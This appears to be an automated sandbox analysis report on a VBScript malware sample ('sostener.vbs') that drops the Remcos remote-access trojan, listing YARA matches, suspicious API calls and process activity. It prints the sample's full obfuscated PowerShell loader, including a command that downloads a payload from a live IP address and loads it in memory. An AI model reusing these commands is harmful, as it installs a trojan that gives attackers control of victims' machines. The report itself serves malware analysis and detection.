?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\			Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process Stats: CPU usage > 49%

Contains functionality to shutdown / reboot the system

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

15_2_004158B9

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFAAC480FFA	7_2_00007FFAAC480FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFAAC55115D	7_2_00007FFAAC55115D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0041D071	15_2_0041D071
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004520D2	15_2_004520D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043D098	15_2_0043D098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00437150	15_2_00437150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004361AA	15_2_004361AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00426254	15_2_00426254
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00431377	15_2_00431377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043651C	15_2_0043651C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0041E5DF	15_2_0041E5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0044C739	15_2_0044C739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004367C6	15_2_004367C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004267CB	15_2_004267CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043C9DD	15_2_0043C9DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00432A49	15_2_00432A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00436A8D	15_2_00436A8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043CC0C	15_2_0043CC0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00436D48	15_2_00436D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00434D22	15_2_00434D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00426E73	15_2_00426E73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00440E20	15_2_00440E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043CE3B	15_2_0043CE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00412F45	15_2_00412F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00452F00	15_2_00452F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00426FAD	15_2_00426FAD

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 004020E7 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 004338A5 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00433FB0 appears 55 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: sostener.vbs

Initial sample: Strings found which are bigger than 50

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2984
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2984			Jump to behavior

Yara signature match

Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: 7.2.powershell.exe.25f10962108.1.raw.unpack, h.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f10962108.1.raw.unpack, au.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f28c70000.4.raw.unpack, h.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f28c70000.4.raw.unpack, au.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f287f0000.3.raw.unpack, h.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f287f0000.3.raw.unpack, au.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, h.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, au.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@14/11@5/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

15_2_00416AB7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

15_2_0040E219

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,

15_2_0041A63F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0883UG

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhpgnei.lkn.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: sostener.vbs

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?